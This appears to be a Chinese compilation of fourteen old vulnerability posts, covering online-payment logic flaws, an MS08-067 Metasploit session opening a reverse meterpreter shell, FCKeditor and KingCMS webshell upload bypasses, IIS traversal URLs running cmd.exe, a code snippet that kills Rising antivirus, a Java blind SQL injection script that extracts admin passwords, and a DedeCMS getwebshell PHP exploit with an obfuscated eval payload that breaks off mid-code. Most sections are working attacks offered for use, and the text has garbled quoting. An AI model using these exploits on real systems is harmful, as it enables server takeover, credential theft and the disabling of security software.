下面是小编为大家准备的在线支付逻辑漏洞总结漏洞预警,本文共14篇,欢迎阅读借鉴。
篇1:在线支付逻辑漏洞总结漏洞预警
0×00 背景介绍
随着网民越来越习惯于网上购物,出现了越来越多的电商网站,在线交易平台等,
其中肯定要涉及在线支付的流程,而这里面也有很多逻辑。
由于这里涉及到金钱,如果设计不当,很有可能造成0元购买商品等很严重的漏洞。
0×01 检测方法与案例
根据乌云上的案例,支付漏洞一般可以分为五类,如果发现其他的类型,欢迎补充:
1、支付过程中可直接修改数据包中的支付金额
这种漏洞应该是支付漏洞中最常见的。
开发人员往往会为了方便,直接在支付的关键步骤数据包中直接传递需要支付的金额。
而这种金额后端没有做校验,传递过程中也没有做签名,导致可以随意篡改金额提交。
只需要抓包看到有金额的参数修改成任意即可。
我们来看一看乌云上的几个案例:
WooYun: 必胜客宅急送支付表单伪造金额
WooYun: 肯德基宅急送支付表单伪造金额
WooYun: 新浪微号存在支付绕过漏洞
WooYun: 淘宝网某处存在严重支付漏洞
WooYun: 佳域手机官方商城支付漏洞 (这个亮点是真的到货了……)
WooYun: 91分站存在支付绕过
WooYun: 江西移动1元钱买手机漏洞
WooYun: 爱拍主站存在严重漏洞
WooYun: 再爆苏宁某站点重大漏洞
WooYun: 苏宁某站点存在严重漏洞
WooYun: TP-Link官方商城支付漏洞
WooYun: 鲜果网支付漏洞
WooYun: 京东商城购买商品时,可以修改商品金额,并且支付成功
WooYun: 京东团购订单金额可在客户端修改并提交网银支付
WooYun: 网通营业厅客户信息泄露、充值支付价格修改漏洞
2、没有对购买数量进行负数限制
这种案例也比较常见,产生的原因是开发人员没有对购买的数量参数进行严格的限制,
这种同样是数量的参数没有做签名,导致可随意修改,经典的修改方式就是改成负数。
当购买的数量是一个负数时,总额的算法仍然是”购买数量x单价=总价”。
所以这样就会导致有一个负数的需支付金额。
若支付成功,则可能导致购买到了一个负数数量的产品,也有可能返还相应的积分/金币到你的账户上。
WooYun: 百脑汇商城支付漏洞
WooYun: m1905电影网存在严重支付漏洞
WooYun: 国美网上商城支付漏洞1元订购Iphone 4S!
WooYun: 又拍网旗下某站存在严重支付漏洞
WooYun: 新蛋中国支付漏洞
WooYun: 拉卡拉商店0元购支付问题
WooYun: 中粮52buy商城的支付漏洞
WooYun: 115网盘存在支付绕过
最后一个漏洞与其他不同的是把数量改成一个超大的数,而不是负数。结果导致支付的金额可能超过一定数值而归0。
3、请求重放
购买成功后,重放其中请求,竟然可以使购买商品一直增加~
阿里云主机多次下订单,会出现0元订单情况,不知道程序员后端是如何写的……
WooYun: 豆丁网购买豆元后可以将豆元倍增
WooYun: 阿里云0元订单,服务器随便买
4、其他参数干扰
此案例金钱已经做了签名认证,修改后不通过。
但是仍然有一个参数会对最后的金额产生影响而没有一起做签名导致问题产生。
WooYun: 新东方逻辑支付漏洞
0×02 修复方案
其实修复方案很简单,对传递的金钱,数量等对最后支付金额会产生影响的所有参数做签名。
并且注意签名算法不可被猜测到。
这样攻击者修改数据的时候验证便不会通过。
同时注意对已经交易的订单不可重复而造成重复重置的漏洞。
篇2:MS08067漏洞漏洞预警
这个漏洞已经暴露了很久了,这里我就不说原理了我也不会,所以直接用metasploit操作一下,大牛请绕过
root@bt:~# genlist -s 10.10.10.*
10.10.10.1
10.10.10.2
10.10.10.128
10.10.10.130
10.10.10.254
root@bt:~# nmap -sS -Pn 10.10.10.128
Starting Nmap 6.01 ( nmap.org ) at -04-23 01:49 EDT
Nmap scan report for attacker.dvssc.com (10.10.10.128)
Host is up (0.0000060s latency).
All 1000 scanned ports on attacker.dvssc.com (10.10.10.128) are closed
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
root@bt:~# nmap -sS -Pn 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.011s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
root@bt:~#
root@bt:~# nmap --script=smb-check-vulns 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.00032s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Host script. results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE--3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
root@bt:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nopsmsf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi -10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.130
RHOST => 10.10.10.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.130 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.10.128:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows - No Service Pack - lang:Unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.10.130
[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.130:3722) at 2014-04-23 01:53:59 -0400
篇3: XSIO漏洞漏洞预警
文章作者:aullik5
原始出处:hi.baidu.com/aullik5/blog ... a02c6785352416.html
今天要讲的这个漏洞是一个非常猥琐的漏洞,
XSIO漏洞漏洞预警
。
大部分网站都有这个漏洞,不光是百度。
什么是XSIO,为什么说它猥琐呢?
XSIO是因为没有限制图片的position属性为absolute,导致可以控制一张图片出现在网页的任意位置。
那么我们就可以用这张图片去覆盖网页上的任意一个位置,包括网站的banner,包括一个link、一个button。
这就可以导致页面破坏。而给图片设置一个链接后,很显然就可以起到一个钓鱼的作用。
XSIO漏洞:
由于对正常的HTML 标签 是没有做过滤的,所以我们可以用这些标签来实施XSIO攻击,
在百度,发blog是在一个table里,所以我们要先把table闭合掉,然后再插入合适的图片。
如以下代码:
复制内容到剪贴板
代码:
百度.jpg(40.08 KB)
2008-10-21 20:50
如图:匿名用户的头像被我覆盖到了banner处.
在实施具体攻击时,可以用图片覆盖link或者banner,当别人点击原本是link或button时,将跳到我们的恶意网站去。
所以说,这是一个非常猥琐的漏洞!
欲知后事如何,且听下回分解!
PS: 本次活动仅仅是个人行为,与任何组织或集体无关.
从明天开始,将进入我们的XSS之旅。
篇4:DeepSoft.com.sys.Servlet上传漏洞漏洞预警
作者:hackdn
注明
JSP+MSSQL的系统,国外应用广,出在注册上传上,过滤不严,修改下面POST,上传JSP
要上载的照片:
DeepSoft.com.sys.Servlet上传漏洞漏洞预警
,
文件大小没有限制,只是“*.ai,*.psd”文件可能上传后无法显示而已。“>
篇5:FCKeditor漏洞利用总结漏洞预警
Fckeditor漏洞利用总结
查看编辑器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2. Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过,
—————————————————————————————————————————————————————————————
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
action=”www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media“ method=”post“>Upload a new file:
—————————————————————————————————————————————————————————————
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
4.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————
5. 突破建立文件夹
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————
6. FCKeditor 中test 文件的上传地址
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————
7.常用上传地址
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址,
—————————————————————————————————————————————————————————————
8.其他上传地址
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录,可以试试。
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
—————————————————————————————————————————————————————————————
9.列目录漏洞也可助找上传地址
Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接浏览盘符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————
10.爆路径漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————
11. FCKeditor 被动限制策略所导致的过滤不严问题
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
而在apache 下,因为”Apache 文件名解析缺陷漏洞“也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
篇6:Access在线解密[PHP源码]漏洞预警
只能解密或者97的MDB文件
/*site:www.t00ls.net */
/*如果 本信息 */
/*by:7jdg QQ:7259561 */
$file=$_FILES['uploadfile']['tmp_name'];
$oldname =$_FILES['uploadfile']['name'];
$ext =strtolower(substr(strrchr($oldname, '.'), 1));
if ($file)
{
if ($ext != ”mdb“)
{
echo ”你传的是MDB文件吗?大学生是你这样吗?
“;
echo ”您知道啥是MDB么?t“ . $oldname . ”是MDB后缀吗?后缀是啥知道不?“;
}
else
{
//为Access2000异或的源码
$PassSource2k=array(0xa1,0xec,0x7a,0x9c,0xe1,0x28,0x34,0x8a,0x73,0x7b,0xd2,0xdf,0x50);
//Access97的异或源码
$PassSource97=array(0x86,0xfb,0xec,0x37,0x5d,0x44,0x9c,0xfa,0xc6,0x5e,0x28,0xe6,0x13);
//$file = 'Level5555.mdb';
$ver = file_get_contents($file,1,null,0x14,1);//版本
$ver = hexdec(bin2hex($ver));
$EncrypFlag= file_get_contents($file,1,null,0x62,1);//加密标志
$EncrypFlag = hexdec(bin2hex($EncrypFlag));
for($i=66;$i < 92; $i++){
$temp = file_get_contents($file,1,null,$i,1);//加密标志
$pass[].=hexdec(bin2hex($temp));
}
if ($ver < 1){
$MdbVersion=”Access 97“;
if(($pass[0] ^ $PassSource97[0])==0)
$MdbPassword=”密码为空!“;
else{
$MdbPassword=”“;
for($i=0;$i < 13; $i++)
$MdbPassword .=chr($pass[$i*2] ^ $PassSource2k[$i]);
}
}else{
$MdbVersion=”Access 2000 or “;
for($i=0;$i < 13; $i++){
if(($i % 2)==0)
$t1 = chr(0x13 ^ $EncrypFlag ^ $pass[$i*2] ^ $PassSource2k[$i]);
else
$t1 = chr($pass[$i*2] ^ $PassSource2k[$i]);
$MdbPassword .=$t1;
}
}
if(ord($MdbPassword[1]) < 0x20 || ord($MdbPassword[1]) > 0x7e)
$MdbPassword=”密码为空!“;
}
}
?>
Access在线解密
MDB文件:
Access版本:
文件名:
密码:
---------------------------------------------------------------------------------------------------------
选择一个本地的mdb文件,上传解密,如发现密码不完整或者解密不出的问题,请随时联系我
---------------------------------------------------------------------------------------------------------
篇7:瑞星0day漏洞漏洞预警
编写成程序后双击运行直接K掉瑞星(重起也没用)
以下是漏洞利用代码
------------------------------------------------------------------------------
DWORD GetProcessIdFromName(LPCTSTR name)
{
PROCESSENTRY32 pe;
DWORD id = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hSnapshot,&pe) )
return 0;
do
{
pe.dwSize = sizeof(PROCESSENTRY32);
if( Process32Next(hSnapshot,&pe)==FALSE )
break;
if(strcmp(pe.szExeFile,name) == 0)
{
id = pe.th32ProcessID;
break;
}
} while(1);
CloseHandle(hSnapshot);
return id;
}
DWORD GetProcessID(char *FileName)
{
HANDLE myhProcess;
PROCESSENTRY32 mype;
BOOL mybRet;
//进行进程快照
myhProcess=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //TH32CS_SNAPPROCESS快照所有进程
//开始进程查找
mybRet=Process32First(myhProcess,&mype);
//循环比较,得出ProcessID
while(mybRet)
{
if(strcmp(FileName,mype.szExeFile)==0)
return mype.th32ProcessID;
else
mybRet=Process32Next(myhProcess,&mype);
}
return 0;
}
void killProcess(CString www ,LPCTSTR name,char *xyz)
{
DWORD nPid = 0;
HANDLE hProcess;
DWORD nExitCode = 0;
DWORD nAddress = 0x1000;
nPid=GetProcessIdFromName(name);
hProcess = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION, 0,nPid);
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
while ( nAddress <= 0x7FFFF000 )
{
GetExitCodeProcess(hProcess, &nExitCode);
if (nExitCode != STILL_ACTIVE)
{
break;
}
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
VirtualFreeEx(hProcess, (LPVOID)nAddress, 0, 0x8000);
nAddress += 0x1000;
}
篇8:kingcms5.0/5.1漏洞漏洞预警
1,kingcms 5.0 fckeditor的默认路径在 admin/system/editor/FCKeditor/editor/fckeditor.Html
把本地的马命名为 hx.asp;jpg 注意看 jpg前面没有点了..
OK了..其实以后做站结合fckeditor这类的编辑器..最好加个验证..只有管理才能访问..这样或者比较好吧
2。编辑器路径:/admin/system/editor/
利用方式:访问www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=qing.asp后在/up_files/image/目录下创建一个明文qing.asp的文件夹,
然后访问www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp,选择刚创建的qing.asp文件夹并上传图片木马,可以上传包含一句话内容的图片,然后使用一句话客户端连接。
3。该系统后台也是比较脆弱的,若能成功登陆后台拿webshell比较简单,后台中有个webftp的功能,可以上传任意文件。默认数据库地址为/db/King#Content#Management#System.mdb,下载的时候将#替换成%23后下载。
有很多存在FCKEDITOR编辑器的基本存在该漏洞 与其说是KINGCMS的漏洞不如说是FCKEDITOR的漏洞
篇9:ACTCMS注入漏洞漏洞预警
一款ASP的CMS程序,用的人并不是太多。
GOOGLE一下关键字“Copyright @ www.actcms.com” ,不是太多。
今天看了一下代码。
基本上所有的参数全都被过滤掉了。。
不过投票那里出了点小问题。。
在/plus/vote/vote.asp页面。
代码如下:
ASP/Visual Basic代码
....
if request(”voted“).count=0 then
response.write ”“
response.end
end if
for i=1 to request(”voted“).count
actcms.actexe(”Update vote_act set VoteNum=VoteNum+1 where id=“&request(”voted“)(i))
next
....
response.Redirect ”index.asp?id=“&id&”“
id直接从request里面取的,不过因为前面是update ,再加上后面的response.redirect,利用起来比较麻烦。而且这是一个一般工具无法识别的注入点。因为无论我们构造什么语句在后面,它都会跳到index.asp页面。
唯一有变化的就是当我们构造的注入条件正确的时候,票数会增加。 手工利用起来相当的麻烦,试了现在的那些注入工具明小子,pangolin之类的也不能注入,所以我自己动手写了一个简单的程序 ,因为只会JAVA,所以就用JAVA写了。。写的比较粗糙。用的穷举法,这样写着比较方便。速度慢就慢吧。
代码如下:
Java代码
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class ActCmsGetPwd {
public static char[] arr = { '0', '1', '2', '3', '4', '5', '6', '7', '8',
'9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',
'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y',
'z' };
public static String siteurl = ”“;
public static int voteid = 1;
public static String charset = ”“;
public static void main(String[] args) throws Exception {
if (args.length < 4) {
System.out
.println(”usage:java ActCmsGetPwd System.out.println(”siteurl:目标站点“); System.out.println(”voteid:投票id“); System.out .println(”totalVoteNum:当前的投票人数,请自行查看plus/vote/index.asp?id= System.out.println(”charset:目标站点所用的ACTCMS的字符集,请自行查看网页源代码“); System.out.println(”eg:java ActCmsGetPwd www.abc.com/ 1 15 gb2312“); return; } siteurl = args[0]; voteid = Integer.parseInt(args[1]); int preVoteNum = Integer.parseInt(args[2]); charset = args[3]; System.out.println(”Code by Ninty , QQ 3191864“); System.out.print(”password is :“); for (int i = 1; i <= 16; i++) { System.out.print(send(i, 0, preVoteNum)); preVoteNum++; } System.out.println(”nDone!“); } public static char send(int a, int b, int preVoteNum) throws Exception { String sql = ”%20and%20(select%20top%201%20mid(password,“ + a + ”,1)%20from%20admin_act%20where%20supertf%20=1)%20=%20'“ + arr[b] + ”'“; URL u = new URL(siteurl + ”/Plus/vote/vote.asp?dopost=send&id=“+voteid+”&ismore=0&voted=3“ + sql); URLConnection conn = u.openConnection; BufferedReader reader = new BufferedReader(new InputStreamReader(conn .getInputStream(),charset)); String str = reader.readLine(); while (str != null) { if (str.indexOf(” 投票人数:“) != -1) { break; } str = reader.readLine(); } reader.close(); if (!isRight(str, preVoteNum)) { return send(a, ++b, preVoteNum); } else { return arr[b]; } } public static boolean isRight(String str, int preVoteNum) { if (str == null) { System.out.println(”无法读取!“); System.exit(0); } Pattern pat = Pattern.compile(”人数:(d+)“); Matcher mat = pat.matcher(str); if (mat.find()) { int num = Integer.parseInt(mat.group(1)); if (num != preVoteNum) { return true; } } return false; } }
下面是已经编译好的 class文件,编译环境JDK6,
直接运行就好。
actcmsgetpwd.class
在网上找了几个站测试了一下,都可以得到超级管理员的密码,不过官网好像不存在这个漏洞。
篇10:fckeditor漏洞利用漏洞预警
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
可以自定义文件夹名称上传图片木马,利用路径解析漏洞,也可以直接上传ASP木马,
fckeditor漏洞利用漏洞预警
,
如果是ASPX的就将/asp/connector.asp后缀改为ASPX
Type=Image这个变量是我们自己定义的。比如:
fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp
篇11:IIS漏洞应用漏洞预警
by yuange
新近发现IIS一堆漏洞,说说应用吧,需要一个虚拟可执行目录,WINDOWS常见的有 /scripts,/cgi-bin,/_vti_bin,一般/_vti_bin目录是映射到“program files”目录,一般会在系统盘上面,而SCRIPTS有时不在系统盘上。还可以找页面查看源文件找一些计数器目录。
比如测试有不有/SCRIPTS目录,可以www.xxx.com/scripts/,现在一般不准许目录浏览有目录就会返回403错误,没有是404。用.ida,.idq,idc等办法也可以试。试试是否可执行,可以www.xxx.com/scripts/&cmd.exe 如果是可执行目录会返回500内部服务器错误,不可执行会返回404找不到文件错误。
只要有了一个可执行目录可以用编码的../进入那盘任意目录运行任意可执行文件,编码方法是../的任意一个字符用%25+其16进制码表示,比如“.”可表示成“%252e”,如果回去层次比较多,可以用编码“../..”的“/”效率比较高。“..%255c..”代表“../..”.
比如要执行 dir d: :
192.168.8.48/scripts/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+d:
要重定向的话输入里面不能有字符串cmd.exe或者command.com,比如要执行 dir d: /a /s 可以:
192.168.8.48/scripts/..%255c../..%255c../winnt/system32/cmd”.exe?/c+dir+d:+/a+/s+>>+d:dir.txt
就是命令CMD.EXE写成cme“.exe,同样“?”后面参数也得注意,有时可以合理利用“*”。
这必须要求可执行目录和执行的命令在一个盘。
另一个方法可以不要求CMD.EXE与可执行目录在一个盘,但要求有一个不是0字节不是真的.exe文件格式的.BAT文件:
IIS可执行目录可以执行可执行的EXE文件,如果BAT文件没有做映射,可执行目录
的BAT是不能执行的。但通过特殊办法可以让BAT文件得到执行,要命的时执行BAT文件
的时候可以用管道符等。
比如我的虚拟目录“/BAT”是映射到“E:”,有可执行权限(不是脚本),我的系
统目录”d:winnt“,e盘有文件“cc.bat”,cc.bat实际内容不是一个可执行文件(这点
必须,要不做可执行文件执行,后面管道符后的命令就不能得到执行),也可以不是一
个正常的BAT文件,
那么下面连接:
192.168.8.48/bat/cc.bat”%20+|+copy+d:winntsystem32cmd.*+e:*.exe
实际就执行了copy d:winntsystem32cmd.* e:*.exe。
注意IIS为了防映射了BAT到CMD,解释BAT文件的时候传递特殊字符,发现命令行有
“cmd.exe”或者“command.com”串的时候,再有字符“&|(,;%”中的一个就会报“HTTP
500 - 内部服务器错误”。注册表里面可以设置 “AllowSpecialCharsInShell”,不让
检测这些特殊字符,缺省是要检测的。
实际上面的HTTP是调用了CreateProcessA(““e:cc.bat” | copy
d:winntsystem32cmd.* e:*.exe“”,..),IIS在可执行文件前后加了“””,这是
CreateProcessA的一个功能,这IIS没有错误。但我的文件名里面加了个““”,实际执
行CreateProcessA这个API的时候就截断成了执行“e:cc.bat”,这个IIS的错误在于
没有检测文件名里面的特殊字符(这儿是“””)。而CreateProcessA这个API又会干很
多IIS不知道的事。如果发现是可执行文件,那么加载执行,如果不是可执行文件而后
缀是BAT会自动调用CMD.EXE解释执行。那么后面管道符后命令也得到执行。
这点需要一个虚拟可执行目录,可执目录同一个盘里面有一个后缀名为“.bat”的
非可执行(一般的.EXE文件)文件,不需要是真实的BAT文件。这点可以突破可执行虚
拟目录所在盘没有系统文件的情况。至于这个BAT文件那就得靠运气或者试试跟目录下
面的“autoexec.bat”或者有些页面有计数器,计数器可以指定计数器文件名,没有文
件自动建立一个。
篇12:DirectAdmin 0day漏洞预警
一般有LINUX是虚拟主机,很难提权,难反弹,
MSF和PHP的那个漏洞除外. 所以日不了。。。
如果有管理平台 DirectAdmin
那么你就能成功
默认登陆地址 ip:2222/
在LINUX下 /usr/local/directadmin/custombuild/mysql_backups 这个目录是用户的备份目录,悲剧的是WWW用户组能访问
如果他备份了,假设他用户是 /home/hacked/domains/11.com/
那么备份文件名字就是hacked.sql
篇13:PageAdmin XSS 漏洞漏洞预警
一站沦陷,全站皆沦
XSS大家都不是很关注了??
www.pageadmin.net/e/info/suc.aspx?code=%3Cscript%3Ealert('hacked%20by%20wing')%3C/script%3E
摘自:www.dis9.com/viewthread.php?tid=1740&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D259
提示:IE 自动拦截恶意代码,防止 XSS 攻击……
篇14:DedeCms v5.5 漏洞漏洞预警
print_r('
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
');
if ($argc < 3) {
print_r('
+----------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to dedecms
Example:
php '.$argv[0].' localhost /dedecms/
+----------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$post_a = 'plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';
$post_b = 'needCode=aa/../../../data/mysql_error_trace';
$shell = 'data/cache/t.php';
get_send($post_a);
post_send('plus/comments_frame.php',$post_b);
$content = post_send($shell,'t=echo tojen;');
if(substr($content,9,3)=='200'){
echo “nShell Address is:”.$host.$path.$shell;
}else{
echo “nError.”;
}
function get_send($url){
global $host, $path;
$message = “GET ”.$path.“$url HTTP/1.1rn”;
$message .= “Accept: */*rn”;
$message .= “Referer: $host$pathrn”;
$message .= “Accept-Language: zh-cnrn”;
$message .= “Content-Type: application/x-www-form-urlencodedrn”;
$message .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn”;
$message .= “Host: $hostrn”;
$message .= “Connection: Closernrn”;
$fp = fsockopen($host, 80);
if(!$fp){
echo “nConnect to host Error”;
}
fputs($fp, $message);
$back = '';
while (!feof($fp))
$back .= fread($fp, 1024);
fclose($fp);
return $back;
}
function post_send($url,$cmd){
global $host, $path;
$message = “POST ”.$path.“$url HTTP/1.1rn”;
$message .= “Accept: */*rn”;
$message .= “Referer: $host$pathrn”;
$message .= “Accept-Language: zh-cnrn”;
$message .= “Content-Type: application/x-www-form-urlencodedrn”;
$message .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn”;
$message .= “Host: $hostrn”;
